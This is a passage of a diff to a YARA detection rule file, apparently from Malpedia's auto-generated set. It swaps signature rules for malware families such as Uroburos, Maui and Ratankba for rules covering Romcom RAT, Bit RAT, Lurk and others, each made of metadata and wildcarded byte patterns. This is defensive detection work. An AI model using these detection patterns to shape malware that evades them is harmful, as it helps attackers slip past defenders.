68fbd5fba3 43 53 897dfc e8???????? 83c40c 56 } + $sequence_1 = { 5a 6a71 6689955affffff 5a 6a61 6689955cffffff } + $sequence_2 = { 6863ad115b 6a04 c745e801000000 8945f4 e8???????? 59 } + $sequence_3 = { e8???????? 59 59 6a00 56 e9???????? } + $sequence_4 = { 6a62 66898556ffffff 58 6a53 66898558ffffff } + $sequence_5 = { 59 6a64 66898d6cffffff 59 6a68 66898d6effffff 59 } + $sequence_6 = { 6a63 6689854cffffff 58 6a62 6689854effffff 58 6a69 } + $sequence_7 = { 66895db2 6a64 8bd9 66895db4 8bd8 66895db6 5b } + $sequence_8 = { 8b45e0 8b08 6a03 50 ff5138 } + $sequence_9 = { 66894dd6 66894dd8 66894dda 66894ddc 66894dde 66894de0 66894de2 } condition: - 7 of them and filesize <8560640 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Uroburos_Auto : FILE +rule MALPEDIA_Win_Cerbu_Miner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "205256f7-2469-53ee-990c-6fdfb536a7d1" - date = "2023-01-25" - modified = "2023-01-26" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.uroburos_auto.yar#L1-L234" + id = "77652d6a-745f-5552-8901-83bf555706f4" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cerbu_miner_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "7cd6167d1ac85667ccf6f37a04c885a4dbb4d487c7aa8e68ed00f9a40de671ad" + logic_hash = "e4927a587588bc11053fcbade5bb9500364c9a656d383eb318cc8486464f3cce" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230124" - malpedia_hash = "2ee0eebba83dce3d019a90519f2f972c0fcf9686" - malpedia_version = "20230125" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7526 85d2 7411 8b493c } - $sequence_1 = { 85d2 7406 8d4801 0fafcd } - $sequence_2 = { 09c9 7407 ffd1 a1???????? 832d????????04 3905???????? 73de } - $sequence_3 = { 85c0 7405 e9???????? 448bc7 } - $sequence_4 = { 8b493c 8bc2 4881c108010000 483bc1 } - $sequence_5 = { 29c0 eb4e 57 56 } - $sequence_6 = { 85c0 750d 48837c245000 0f95c0 8803 33c0 } - $sequence_7 = { 895c2430 e9???????? 33d2 448d4268 } - $sequence_8 = { 09c0 7503 21450c 837d0c00 } - $sequence_9 = { 83fe01 89450c 750c 09c0 7537 57 50 } - $sequence_10 = { 54 5d 53 8b5d08 56 8b750c 09f6 } - $sequence_11 = { 5f 09ff 59 751e 56 ff15???????? 8d86e8030000 } - $sequence_12 = { 40 c20c00 55 54 5d } - $sequence_13 = { 7704 4183c220 4585c9 740a 453bca 7505 4d85c0 } - $sequence_14 = { 8bc1 f7f5 85d2 7406 } - $sequence_15 = { 7433 eb13 8b0d???????? 8b09 09c9 7407 } - $sequence_16 = { 48 8bf0 49 2bf5 4c } - $sequence_17 = { 83c601 49 83c508 41 3bdf 7c82 45 } - $sequence_18 = { 750a 8d43ff e9???????? 33db } - $sequence_19 = { b901000000 e8???????? 48 85c0 48 8bd8 } - $sequence_20 = { 85c0 7434 48 83c310 83c701 48 } - $sequence_21 = { ff15???????? 44 8bd8 49 c1e320 4c } - $sequence_22 = { 8b8f58010000 e8???????? 48 895c2430 } - $sequence_23 = { 8b5c2450 48 83c448 c3 4c 8bc6 } + $sequence_0 = { 88b42480000000 eb3f 83e902 7433 83e904 7413 83e909 } + $sequence_1 = { 7412 48 8d0d0b360500 48 83c428 48 ff25???????? } + $sequence_2 = { 8d4601 c643012e 48 63c8 41 8d4602 48 } + $sequence_3 = { 85d2 7427 85c9 b800040000 41 b800080000 44 } + $sequence_4 = { f6473801 7402 eb18 48 8bcf ff15???????? f6473801 } + $sequence_5 = { e9???????? 45 8bfd 44 89ad50010000 e9???????? 44 } + $sequence_6 = { 48 89442420 e8???????? 48 8bd7 48 8bcb } + $sequence_7 = { 89b42418010000 8b74242c 83feff 7515 837f0c00 7c0f 48 } + $sequence_8 = { 8d057b52f9ff 48 894518 c745b0e6070000 48 c745c000000200 48 } + $sequence_9 = { 44 2bc0 44 8903 33c0 48 8b5c2438 } condition: - 7 of them and filesize <1136640 + 7 of them and filesize <1040384 } -rule MALPEDIA_Win_Eyservice_Auto : FILE +rule MALPEDIA_Win_Nemim_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e6b201c5-31f5-59a2-a52d-309e470fcb5a" + id = "7264494b-d73b-5298-a829-f60e4932364f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.eyservice_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nemim_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "a8d5ae517d0720536deb96b397532bb33ed4fe4db40da33e37b572e015c805c7" + logic_hash = "0e5cb332d550079bcd770b6c5ca18dad9c60646bca1f9092ed4ed3564e5ea600" score = 75 quality = 75 tags = "FILE" @@ -184246,32 +187012,32 @@ rule MALPEDIA_Win_Eyservice_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1f802 3bf0 72da eb22 8b0d???????? 2b0d???????? c1f902 } - $sequence_1 = { 6a01 6a01 68???????? ffd6 83c410 8d542410 52 } - $sequence_2 = { 83bef800000000 747c 8d4c2408 e8???????? a1???????? 8d4c2408 51 } - $sequence_3 = { 6808020000 8d8e34020000 51 e8???????? 85c0 7c1e } - $sequence_4 = { 83c404 8bc8 e8???????? 8bf0 8bce e8???????? 8b4f10 } - $sequence_5 = { e8???????? b901000000 66894f08 5f 5e 5d 8d410d } - $sequence_6 = { 68???????? 8d542418 52 ff15???????? 85c0 754f 88442414 } - $sequence_7 = { 50 03f7 56 e8???????? 8b4c2420 83c410 5f } - $sequence_8 = { a3???????? e8???????? 6a06 68???????? 56 a3???????? } - $sequence_9 = { 85c0 7459 66837d005c 7452 66837c24145c 754a } + $sequence_0 = { a1???????? c1e002 89b48050744300 8b0d???????? 893d???????? 890d???????? } + $sequence_1 = { eb3b a1???????? 68???????? 50 e8???????? 83c408 } + $sequence_2 = { 5e 5b c9 c20400 8bc1 c700???????? c3 } + $sequence_3 = { 5e 5d b801000000 5b 81c4bc000000 c3 } + $sequence_4 = { 8d44240c 55 50 56 c744241828010000 e8???????? 85c0 } + $sequence_5 = { 51 e8???????? 8dbc24600a0000 83c9ff 33c0 } + $sequence_6 = { 8b16 c1ea08 885001 8b0e c1e910 } + $sequence_7 = { 52 e8???????? 8b4c2440 8944244c b801000000 } + $sequence_8 = { 83fe10 7cde c605????????00 b90b000000 be???????? 8dbc2410010000 } + $sequence_9 = { 8844244c e8???????? 68???????? e8???????? 68???????? 8bf0 } condition: - 7 of them and filesize <452608 + 7 of them and filesize <499712 } -rule MALPEDIA_Win_Virtualgate_Auto : FILE +rule MALPEDIA_Win_Powershellrunner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5ab8135e-3bbe-5abd-acc2-717daf53613e" + id = "52f34db7-4f5a-5a7d-b993-5b0a17757274" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virtualgate" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virtualgate_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powershellrunner_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "5ca5297d10bab80aa59720f493a7b89d0ffff3ac0eaaf62e59c4e5ea64ea6f84" + logic_hash = "c0bbeb809fa33bde57fda2fd6bac480ecf51cfd19b2b4c46994cda378bb784a0" score = 75 quality = 75 tags = "FILE" @@ -184285,32 +187051,32 @@ rule MALPEDIA_Win_Virtualgate_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4157 4883ec38 4c63e9 488bf2 498bc5 488d0dc7f10000 } - $sequence_1 = { 4b8794fed02a0200 eb2d 4c8b15???????? ebb8 4c8b15???????? 418bc2 b940000000 } - $sequence_2 = { 8d58b0 498bce 448bc3 488d1580bd0000 e8???????? 85c0 7429 } - $sequence_3 = { ff15???????? c705????????00001000 eb26 4183f802 } - $sequence_4 = { 488bc8 ff15???????? 3b05???????? 488bcb 89442450 7608 } - $sequence_5 = { 48894527 498bc0 48ffc0 41381407 75f7 498bc8 48ffc1 } - $sequence_6 = { 4c8d05b4d30000 488d15b1d30000 e8???????? 4885c0 7416 } - $sequence_7 = { 488bf5 4803d2 498b94d750b50100 e8???????? 85c0 } - $sequence_8 = { 4c8d058dbe0100 488bd5 48c1fa06 4c893403 488bc5 } - $sequence_9 = { 488b8c2420800200 4833cc e8???????? 488b9c2450800200 } + $sequence_0 = { 4889442440 488b442420 488b8c2498000000 482bc8 488bc1 4c8bc0 488b542440 } + $sequence_1 = { 488d4c2448 e8???????? 0fb6c0 85c0 7439 } + $sequence_2 = { 668984240e020000 b828000000 6689842410020000 b828000000 6689842412020000 b867000000 6689842414020000 } + $sequence_3 = { 488bcd 488d1529b20100 83e13f 488bc5 48c1f806 48c1e106 48030cc2 } + $sequence_4 = { 6689842488000000 b865000000 668984248a000000 b872000000 668984248c000000 b86e000000 668984248e000000 } + $sequence_5 = { 4833c4 4889842428010000 48c744245800000000 48c744246800000000 c744244c00000000 c744244800000000 b853000000 } + $sequence_6 = { f30f6f0f 4883f80e 7773 8b848654da0100 4803c6 ffe0 } + $sequence_7 = { e8???????? 4889442458 488b8c2490000000 e8???????? 4889442448 } + $sequence_8 = { 48894c2408 48b8ffffffffffffff1f c3 48894c2408 48b8ffffffffffffff3f c3 4c894c2420 } + $sequence_9 = { 4c8d0df9b30000 488be9 4c8d05e7b30000 488d15e8b30000 b914000000 e8???????? 4885c0 } condition: - 7 of them and filesize <323584 + 7 of them and filesize <458752 } -rule MALPEDIA_Win_Ratankba_Auto : FILE +rule MALPEDIA_Win_Pocodown_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fd423e85-7c69-52a0-9324-ef5e9762e7e8" + id = "57027d9b-6e81-5ca8-a0ac-bbfd288eda02" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ratankba_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pocodown_auto.yar#L1-L101" license_url = "N/A" - logic_hash = "49523307c1fdb5d69527def26960d83b0ac500a3f11bec0bed9b0e81e333a8ec" + logic_hash = "d2d2c3510515a24653939603c26fb696816a72e2a82e1c859f658b0238b45291" score = 75 quality = 75 tags = "FILE" @@ -184324,32 +187090,30 @@ rule MALPEDIA_Win_Ratankba_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5d c20800 8b4d0c 803900 7416 807d0b00 7410 } - $sequence_1 = { 53 b8???????? 668911 e8???????? 8d8ec0000000 c645fc05 33c0 } - $sequence_2 = { 53 ff15???????? 85c0 740e 8b45fc 85c0 7407 } - $sequence_3 = { 55 8bec ff4724 8b4724 53 56 394718 } - $sequence_4 = { e8???????? 8b4310 33ff 3bc7 7649 397e10 7644 } - $sequence_5 = { 720a b857000780 e8???????? 8b4b04 5f 8944d104 8bc2 } - $sequence_6 = { 83c414 85c0 744f 8bc8 e8???????? 8bf0 a1???????? } - $sequence_7 = { 0f849b010000 83c302 46 ebaa 8b5710 8bc6 8955e4 } - $sequence_8 = { 8975f4 85f6 790b 5e 83c8ff 5b 8be5 } - $sequence_9 = { 56 66898578efffff 51 83c8ff 8dbd78efffff c7858cefffff07000000 } + $sequence_0 = { 8b84248c000000 ffc8 898424a0010000 c784248800000000000000 ba01000000 488b8c24e0010000 } + $sequence_1 = { 8b84248c000000 ffc8 8984248c000000 83bc248c00000007 0f875d010000 486384248c000000 } + $sequence_2 = { 8b842490000000 25ff000000 488b4c2430 884101 } + $sequence_3 = { 8b84248c020000 8944244c 488b8c2420030000 e8???????? } + $sequence_4 = { 8b842490000000 2500040000 85c0 740a c744245000000000 eb0a 8b442448 } + $sequence_5 = { 8b84248c020000 448bc0 ba5c000000 488d8c24f0010000 e8???????? } + $sequence_6 = { 8b84248c020000 448bc0 488d9424f0010000 488d8c24a0020000 e8???????? } + $sequence_7 = { 8b842490000000 39442420 0f83e0000000 488d442438 41b808000000 488b542440 } condition: - 7 of them and filesize <303104 + 7 of them and filesize <6703104 } -rule MALPEDIA_Win_Smac_Auto : FILE +rule MALPEDIA_Win_Bs2005_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b9e948cf-fc1c-55b5-a40e-593d0b67f4eb" + id = "ef8c48f9-bc67-59c3-a57f-caa042b605de" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smac_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bs2005_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "69ecbaffb88ef2eb7b0bb4fc54b666c372bcfee7df6d63633067f160f5f10295" + logic_hash = "31d800fc437e882f8e75451d429896908d917d51b135f51d420139339a52e53c" score = 75 quality = 75 tags = "FILE" @@ -184363,32 +187127,32 @@ rule MALPEDIA_Win_Smac_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66898548ffffff 8bc3 6689854affffff 58 6a74 6689854cffffff 58 } - $sequence_1 = { 39bd78feffff 0f86b8000000 ffb578feffff e8???????? ffb578feffff 8bf0 57 } - $sequence_2 = { 668945ec 668975ea 8d8598feffff 8bf4 89a578feffff 50 } - $sequence_3 = { 8d9d44ffffff e8???????? 6a01 33ff 8bf3 e8???????? 8b1d???????? } - $sequence_4 = { e8???????? 83ec1c c68424900100000e 8d842484000000 8bf4 8964245c } - $sequence_5 = { 8945f0 3bc3 7514 6a01 33ff 8d7508 e8???????? } - $sequence_6 = { 83c42c 33f6 46 5b ffb5f480ffff ff15???????? } - $sequence_7 = { 8986d8000000 ffd7 8986dc000000 8bc6 e8???????? c20800 6a00 } - $sequence_8 = { 8bf4 89a578feffff 50 e8???????? 83ec1c c645fc04 8d4528 } - $sequence_9 = { 66899d42ffffff 5b 6a74 66899d44ffffff 5b } + $sequence_0 = { ff15???????? 85c0 0f845f030000 8b500c } + $sequence_1 = { 7505 b83f000000 8d5abf 83c9ff 80fb19 771c 0fbeca } + $sequence_2 = { 51 50 8b02 83c041 50 e8???????? 8b974c060000 } + $sequence_3 = { 8b02 8a9049000400 8b8f54060000 889111010000 } + $sequence_4 = { 51 c645c800 e8???????? 83c40c b9???????? 8d8324010000 8da42400000000 } + $sequence_5 = { eb09 3c2f 7505 b93f000000 8d5abf 83c8ff 80fb19 } + $sequence_6 = { 50 8d9500ffffff 52 68???????? e8???????? 6804010000 6a00 } + $sequence_7 = { ffd6 33c0 68???????? 8d4dec 68???????? 51 8945ec } + $sequence_8 = { 8945f8 3b45f0 7cea 8b4510 } + $sequence_9 = { 8d419f 3c19 7708 0fbef1 83ee47 eb25 } condition: 7 of them and filesize <212992 } -rule MALPEDIA_Win_Maui_Auto : FILE +rule MALPEDIA_Win_Bit_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3b08a716-7f90-5bcd-af98-705f5527c8fd" + id = "49210a4b-5430-57e8-a054-5667e0ae3196" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maui" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maui_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bit_rat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "da972ed3bba518a07c1d6cad703f6be4a891f59859651a81726f8cacb62eabef" + logic_hash = "eb9ba4fd39163b3bb9047c43b4366afc9171afe908b68fc3b3d7fbbef1990e08" score = 75 quality = 75 tags = "FILE" @@ -184402,69 +187166,71 @@ rule MALPEDIA_Win_Maui_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b1b 895c2410 a810 0f841a010000 57 51 25c0000000 } - $sequence_1 = { 83c40c 85c0 7515 53 e8???????? 57 e8???????? } - $sequence_2 = { 83c404 5f 5b 5e 5d c3 8bce } - $sequence_3 = { c1e010 094610 0fb64101 41 99 0fa4c208 095614 } - $sequence_4 = { e8???????? 83c408 85c0 0f846b010000 3b5d20 8d4518 7e0a } - $sequence_5 = { 85c0 750a 68d0010000 e9???????? 8b542438 8b02 56 } - $sequence_6 = { e8???????? 83c40c 85c0 0f849b010000 8d442428 57 50 } - $sequence_7 = { 8bac24a4000000 f7463c00010000 753a 8b4628 8b10 89542460 8b5004 } - $sequence_8 = { 50 50 50 50 e8???????? 83c414 ff33 } - $sequence_9 = { e8???????? 53 89442438 8907 e8???????? 53 89442460 } + $sequence_0 = { 85c9 753f 6a00 6a00 68c1000000 6809020000 6a28 } + $sequence_1 = { ff7608 ff74241c e8???????? 8be8 83c408 85ed 7425 } + $sequence_2 = { e8???????? 8be8 83c408 85ed 7930 6a00 6a00 } + $sequence_3 = { 8be5 5d c3 8b4510 8320b7 c7400400000000 33c0 } + $sequence_4 = { e8???????? 83c408 85c0 74cf 894704 8b450c 895f10 } + $sequence_5 = { f20f114af8 f20f1142f0 0fbf06 660f6ec8 0fbf46fe 83c608 f30fe6c9 } + $sequence_6 = { f644242401 895c2410 7413 83faff 0f84f5000000 42 89542414 } + $sequence_7 = { eb12 6a00 6a00 6a06 6a79 6a2c e8???????? } + $sequence_8 = { f00fc14108 48 7505 8b01 ff5004 8b4df4 64890d00000000 } + $sequence_9 = { c70100000000 83c104 83c204 3bce 75e8 8bc2 5e } condition: - 7 of them and filesize <1616896 + 7 of them and filesize <19405824 } -rule MALPEDIA_Win_Unidentified_089_Auto : FILE +rule MALPEDIA_Win_Romcom_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f61e4a77-808b-5e07-801b-03e57ce838b5" - date = "2023-07-11" - modified = "2023-07-15" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_089_auto.yar#L1-L98" + id = "38f54401-b8aa-5a45-84bf-23c46fbb1d9b" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.romcom_rat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "f9666eb88fbd91e0eb2e4b4c8812230b36d73d66192fed407aecfaa8f0ed362a" + logic_hash = "0162bd825b9587687f6d0e11e69966dd0894464ab2922749a2bae5afcccbf5b8" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20230705" - malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41" - malpedia_version = "20230715" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 889dd4feffff 899d84feffff 898588feffff 889d74feffff 33c0 } - $sequence_1 = { 8b4508 e8???????? c20c00 e8???????? cc 6a30 } - $sequence_2 = { f2e9e3000000 55 8bec eb0d ff7508 e8???????? } - $sequence_3 = { 83f904 0f8582000000 8b75d0 8bfb } - $sequence_4 = { eb0f ff7634 57 ff562c } - $sequence_5 = { 88041e 880c1f 0fb6041e 8b4dfc 03c2 8b550c } - $sequence_6 = { 3dffffff7f 0f87a2000000 03c0 3d00100000 7227 } - $sequence_7 = { 56 6a01 8d4dec 8975d8 } + $sequence_0 = { b910000000 e8???????? 488945a0 4885c0 7410 44897008 488d0d6fc20400 } + $sequence_1 = { d3e8 49895108 418901 49895110 0fb60a 83e10f 4a0fbe8401a0ac0600 } + $sequence_2 = { 488d95e0310000 488d4dc0 e8???????? 448bc6 33d2 488d8de0310000 e8???????? } + $sequence_3 = { 488b01 488b4030 ff15???????? 83f8ff 7406 41884709 eb03 } + $sequence_4 = { 482bc1 4883c0f8 4883f81f 0f877d030000 e8???????? 488d4580 48837d9808 } + $sequence_5 = { 8a4709 3a4508 744b 84c9 7542 488b0f 4885c9 } + $sequence_6 = { 488d0dbac50400 488908 eb03 498bc6 4c8bc3 488bd0 488bcf } + $sequence_7 = { eb04 4d895d00 b801000000 41884508 488b542468 eb05 b801000000 } + $sequence_8 = { f20f10fc f20f58cc f20f10d1 f20f10c1 4c8d0d39090300 f20f101d???????? f20f100d???????? } + $sequence_9 = { 7510 488d0d12c90500 e8???????? 85c0 742e 32c0 eb33 } condition: - 7 of them and filesize <389120 + 7 of them and filesize <1211392 } -rule MALPEDIA_Win_Telb_Auto : FILE +rule MALPEDIA_Win_Dorshel_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "41000399-e9f0-5453-bf9a-ecf53c98abcc" + id = "550d8628-f52a-56de-91a7-ece0c38b96fb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.telb" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.telb_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dorshel_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "96b99ffd86058bdff13d6d8551ee9f8fb32df4a8153fed924c3d3ed45dd1d6ae" + logic_hash = "364203df24c6a83e17731caab6caa244bb9a531055fdc65fef6d763de8c4fb40" score = 75 quality = 75 tags = "FILE" @@ -184478,32 +187244,32 @@ rule MALPEDIA_Win_Telb_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c744242400000000 e8???????? 68???????? ff15???????? a3???????? 8d4c2430 6a12 } - $sequence_1 = { 68???????? 8d8c24a4000000 e8???????? 8d8c24a0000000 e8???????? 8d8c24a0000000 } - $sequence_2 = { 668908 8d8d68eeffff c645fc26 e8???????? 8d8d68eeffff e8???????? 8d8dd0efffff } - $sequence_3 = { 8945fc 85f6 7407 83feff 746f eb69 8b1c9d485c4100 } - $sequence_4 = { 50 e8???????? 8b853ceeffff 83c40c 8985b0efffff 89b5b4efffff c645fc35 } - $sequence_5 = { 8d85f0bfffff 50 ff15???????? 85c0 0f847b020000 6800200000 } - $sequence_6 = { 0f8796150000 52 51 e8???????? 83c408 807c241200 } - $sequence_7 = { 8d442468 50 e8???????? 837c244408 8d4c2430 } - $sequence_8 = { 0f438570efffff 8d8d88efffff 50 e8???????? 6a01 68???????? 8d8d88efffff } - $sequence_9 = { 85f6 0f8551010000 a1???????? b9???????? 83c0f5 50 56 } + $sequence_0 = { 55 8bec 83ec0c 31c0 648b5030 8b520c 8b5214 } + $sequence_1 = { 8d7708 8b3f 33fb f3a4 5f } + $sequence_2 = { 03f8 84c0 75f6 81ff5e515e83 7408 81ff36cadb30 75da } + $sequence_3 = { 83c004 e2f9 58 54 50 } + $sequence_4 = { 51 8b0f 33cb 51 ff55f8 8b5df4 } + $sequence_5 = { 54 50 8b4f04 33cb 51 8b0f } + $sequence_6 = { ffd5 85c0 74cd 8b07 01c3 } + $sequence_7 = { ac c1cf0d 03f8 84c0 75f6 81ff5e515e83 7408 } + $sequence_8 = { 57 6800200000 53 56 68129689e2 ffd5 85c0 } + $sequence_9 = { 5f 8b4704 33c3 83c104 99 } condition: - 7 of them and filesize <286720 + 7 of them and filesize <24576 } -rule MALPEDIA_Win_Darktequila_Auto : FILE +rule MALPEDIA_Win_Lurk_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "24336c6c-1ca4-5e88-a6d8-a7828b6362d5" + id = "67fdecf6-fece-5b5e-aa84-6821eaa887bc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darktequila_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lurk_auto.yar#L1-L180" license_url = "N/A" - logic_hash = "cfa088d1d1871ddb38182a8cfb5b3421267e6793e63357e090f59bf6001f73cc" + logic_hash = "1d68cad8f119a971efeb0a8c788b3983d9ce03607f838f5c4c4d29840d917af1" score = 75 quality = 75 tags = "FILE" @@ -184517,32 +187283,38 @@ rule MALPEDIA_Win_Darktequila_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c3 85c9 7414 8b5b10 85c0 } - $sequence_1 = { 85c0 740d 894610 b801000000 897e04 } - $sequence_2 = { 8b45fc 50 ff15???????? 8b0d???????? 8b5508 } - $sequence_3 = { e8???????? 83c410 897b08 5f } - $sequence_4 = { 8bd3 e8???????? 8b4310 56 } - $sequence_5 = { 740d 894610 b801000000 897e04 5b } - $sequence_6 = { 72dc b8???????? c3 33d2 3915???????? 0f857c000000 } - $sequence_7 = { 8945f8 85c0 7467 8b4b0c 8b5310 894df4 } - $sequence_8 = { 83c410 897b08 5f b801000000 5e } - $sequence_9 = { c705????????02000000 8b45fc 50 ff15???????? 8b0d???????? 8b5508 a1???????? } + $sequence_0 = { ff7508 ff15???????? 8b35???????? 50 ff7508 } + $sequence_1 = { 8b4508 5b 5f 5e c9 c3 55 } + $sequence_2 = { 8b4d08 8b5110 83c201 8b4508 895010 8b4dac 51 } + $sequence_3 = { f3a5 66a5 33db 395d08 } + $sequence_4 = { 72cc 33c9 8bc1 99 6a0b 5f f7ff } + $sequence_5 = { c1ee03 33ce eb0e c1e60b 33ce 8bf0 c1ee05 } + $sequence_6 = { 59 3bc7 7534 0fbe4203 } + $sequence_7 = { 8b3d???????? 33f6 bb24080000 53 6a40 8975ec } + $sequence_8 = { ff750c 83ceff ff7508 ff7510 e8???????? 83c418 85c0 } + $sequence_9 = { ff750c 57 ff15???????? 85c0 7411 395dfc 750c } + $sequence_10 = { 68???????? 8d85ecfeffff 50 ff15???????? 8d85ecfeffff 50 } + $sequence_11 = { ebf8 56 8bf0 33c0 85d2 8bca 740c } + $sequence_12 = { 8945fc 8b4d10 8b91a4000000 8955f8 837df800 7661 } + $sequence_13 = { c9 c3 55 8bec 81ec08010000 6a35 6a40 } + $sequence_14 = { 744d 56 8d4508 50 } + $sequence_15 = { 83f866 7567 3bf0 7563 0fbe4205 50 e8???????? } condition: - 7 of them and filesize <1827840 + 7 of them and filesize <5316608 } -rule MALPEDIA_Win_Sysget_Auto : FILE +rule MALPEDIA_Win_Jessiecontea_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "950c6328-1de5-5d85-b009-d36eceeda441" + id = "526b090a-a995-58b5-b843-1e70dd71cefc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sysget_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea" + source_url = 